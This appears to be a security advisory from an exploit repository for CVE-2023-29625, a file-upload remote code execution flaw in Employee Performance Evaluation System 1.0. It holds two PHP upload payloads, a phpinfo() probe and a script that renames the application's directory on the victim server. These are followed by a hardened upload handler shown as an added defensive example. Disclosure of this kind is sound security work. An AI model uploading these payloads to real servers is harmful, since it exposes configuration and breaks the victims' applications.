CVE-2023-29625: CVE-nu11secur1ty/vendors/oretnom23/2023/Employee-Performance-Evaluation-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

Employee Performance Evaluation System v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

CVE
#vulnerability #git #php #rce


Vendor

Description:

The Employee Performance Evaluation System 1.0 suffers from a file inclusion / RCE vulnerability. An ordinary user of this system is allowed to submit or upload a malicious file to the server. That user can then remotely execute the included malicious file on the victim's server. This can bring the system to disaster: all information inside it can be destroyed, or it can be stolen.

STATUS: CRITICAL Vulnerability

[+]Get Info:

```php
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```

[+]Exploit:

```php
<?php
// by nu11secur1ty - 2023
// Old name of the file
$old_name = "C:/xampp7/htdocs/pwnedhost7/epes/";

// New name for the file
$new_name = "C:/xampp7/htdocs/pwnedhost7/epes15/";

// using rename() function to rename the file
rename($old_name, $new_name);
?>
```

RCE using curl protocol
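As an added example (not the advisory's or the vendor's code), here is a PHP upload handler with the checks whose absence produces this class of bug: an extension allow-list, a check of the real file content, a random server-chosen name, and storage outside the web root so an uploaded script is never served or executed. UPLOAD_DIR, MAX_BYTES and the allowed types are assumptions.

```php
<?php
// Added example, not the advisory's code: a hardened upload handler showing
// the checks whose absence lets an uploaded .php file run on the server.
// UPLOAD_DIR, MAX_BYTES and the allow-list are assumptions.
declare(strict_types=1);

// Uploads live outside the web root, so nothing stored here is ever served
// or executed by PHP, whatever its name or extension.
const UPLOAD_DIR = '/var/app/uploads';   // assumed path, not under htdocs
const MAX_BYTES  = 2 * 1024 * 1024;      // assumed 2 MiB limit
// Permitted extensions, each mapped to the MIME type its content must have.
const ALLOWED = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
];

/**
 * Validate one $_FILES entry and move it to a random, non-executable name.
 * Returns the stored file name or throws on the first failed check.
 */
function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only the final extension counts, and it must be on the allow-list.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Inspect the real content; $file['type'] is chosen by the client.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, not ." . $ext);
    }
    // Server-chosen random name: the uploader never controls the stored path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move upload');
    }
    chmod($dest, 0640);   // readable by the app user, never executable
    return $stored;
}
```

Running the web server as a user with no write access to htdocs complements this: the rename() of a directory under the web root shown in the exploit above then fails even if a script does get executed.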

Reproduce:

href

Proof and Exploit:

href

Reference:

href

Time spent:

00:17:00
